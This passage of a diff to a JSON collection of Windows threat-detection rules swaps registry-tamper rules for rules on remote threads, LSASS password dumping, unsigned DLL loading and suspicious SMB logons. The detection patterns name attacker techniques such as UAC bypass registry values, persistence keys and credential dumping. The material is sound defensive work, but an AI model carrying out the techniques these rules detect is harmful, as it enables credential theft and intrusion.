= '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", - "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ - "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "ServiceDll Hijack", - "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", + "title": "Suspicious Remote Thread Target", + "id": "f016c716-754a-467f-a39e-63c06f773987", "status": "experimental", - "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrative scripts", - "Installation of a service" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" ], - "filename": "registry_set_servicedll_hijack.yml" + "filename": "create_remote_thread_win_susp_remote_thread_target.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "title": "Remote Thread Creation Via PowerShell", + "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1133" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "create_remote_thread_win_powershell_crt.yml" }, { - "title": "Disable UAC Using Registry", - "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", - "status": "experimental", - "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", - "author": "frack113", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "status": "test", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_disable_uac_registry.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "status": "experimental", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely" + "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "win_lsa_server_normal_user_admin.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Sysinternals Tools AppX Versions Execution", + "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "description": "Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the applications from the Windows Store" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" }, { - "title": "Potential PendingFileRenameOperations Tamper", - "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", - "status": "experimental", - "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", - "author": "frack113", + "title": "Suspicious Rejected SMB Guest Logon From IP", + "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "status": "test", + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.credential_access", + "attack.t1110.001" ], "falsepositives": [ - "Installers and updaters may set currently in use files for rename after a reboot." + "Account fallback reasons (after failed login with specific account)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" ], - "filename": "registry_set_susp_pendingfilerenameoperations.yml" + "filename": "win_smbclient_security_susp_failed_guest_logon.yml" }, { - "title": "Register New IFiltre For Persistence", - "id": "b23818c7-e575-4d13-8012-332075ec0a2b", + "title": "Potential CVE-2023-23397 Exploitation Attempt - SMB", + "id": "de96b824-02b0-4241-9356-7e9b47f04bac", "status": "experimental", - "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "description": "Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.exfiltration", + "cve.2023.23397" ], "falsepositives": [ - "Legitimate registration of IFilters by the OS or software" + "Some false positives may occur from external trusted servers. Apply additional filters accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE 